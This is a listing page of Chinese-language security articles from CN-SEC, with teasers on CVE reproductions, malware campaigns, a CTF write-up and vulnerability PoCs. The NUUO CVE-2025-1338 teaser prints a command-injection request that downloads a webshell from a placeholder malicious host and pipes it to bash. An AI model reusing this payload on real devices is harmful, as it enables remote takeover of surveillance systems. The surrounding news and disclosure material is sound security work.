admin 发表的所有文章 | CN-SEC 中文网

安全新闻

网安原创文章推荐【2025/4/27】

2025-04-27 微信公众号精选安全技术文章总览洞见网安 2025-04-27 0x1 【成功复现】CrushFTP身份认证绕过漏洞（CVE-2025-2825)弥天安全实验室 2025-04-2...

04月29日15 views评论

阅读全文

CTF专场

UKFC2024 ACTF WP

ACTF为浙江大学AAA战队组织的XCTF分赛。本场赛事累计吸引了来自全球66个国家和地区、510支战队、3422人次参与，365支队伍成功签到。本次比赛，UKFC位列16名。Webnot so we...

04月29日7 views评论

阅读全文

安全新闻

IBM 警告：网络犯罪分子现在更注重窃取凭证，而非使用勒索软件

导读IBM X-Force 2025 威胁情报指数报告显示，网络犯罪分子正在改变其攻击策略。越来越多的黑客不再主要使用勒索软件锁定系统，而是试图悄悄窃取登录信息。IBM 研究了来自 130 多个国家...

04月29日11 views评论

阅读全文

安全新闻

DslogdRAT 恶意软件利用 Ivanti ICS 0day漏洞（CVE-2025-0282）攻击日本

导读网络安全研究人员警告称，一种名为 DslogdRAT 的新恶意软件在利用 Ivanti Connect Secure (ICS) 中现已修补的安全漏洞部署。JPCERT/CC 研究员 Yuma ...

04月29日9 views评论

阅读全文

安全漏洞

核弹级漏洞预警｜NUUO监控设备远程沦陷实录(CVE-2025-1338) POC

0x01 漏洞杀伤链攻击向量： GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1Host: t...

04月29日59 views评论

阅读全文

安全新闻

立即保护好Clash Verge rev！远程命令执行漏洞公开！

立即保护好Clash Verge rev！远程命令执行漏洞公开！免责声明: 本文仅限学习、研究使用！其他用途责任自负背景信息2天之前clash Verge rev 被爆出存在本地提权漏洞，群友们传的...

04月29日84 views评论

阅读全文

安全漏洞

深澜计费管理系统 down-load 任意文件读取漏洞

内容仅用于学习交流自查使用，由于传播、利用本公众号所提供的POC信息及POC对应脚本而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号Nday Poc及作者不为此承担任何责任，一旦造成后...

04月29日20 views评论

阅读全文

安全新闻

Docker 惊现新型加密挖矿攻击，借 Teneo 平台开辟恶意获利新路径

关键词网络攻击网络安全研究人员详细披露了一场恶意软件攻击活动，该活动采用一种此前未被记录的技术，针对 Docker 环境进行加密货币挖掘。根据 Darktrace 和 Cado Security 的研...

04月29日6 views评论

阅读全文

Angr符号执行练习XorDDoS某样本字符串解密

创建: 2025-04-24 22:26更新: 2025-04-25 19:04链接: https://scz.617.cn/unix/202504242226.txt目录: ...

04月28日程序逆向7 views评论

阅读全文

安全工具

Monkey Strike测试版发布

0x01 阅读须知花果山的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操...

04月28日24 views评论

阅读全文

安全新闻

黑客组织推出加盟新模式，勒索攻击威胁恐将全面升级

DragonForce黑客组织以卡特尔模式整合勒索团伙，允许附属方使用自有品牌且无需维护基础设施。虽宣称不攻击癌症医院，但通过白标模式降低作案门槛，已吸引RansomBay等团伙加入。勒索软件领域正在...

04月28日10 views评论

阅读全文

安全文章

edu教育部的一次越权测试

声明本文章所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.前言现在很多的网站都很不好测试，我们在进行测试的时候大多都是找登录口...

04月28日9 views评论

阅读全文

admin

在线咨询

微信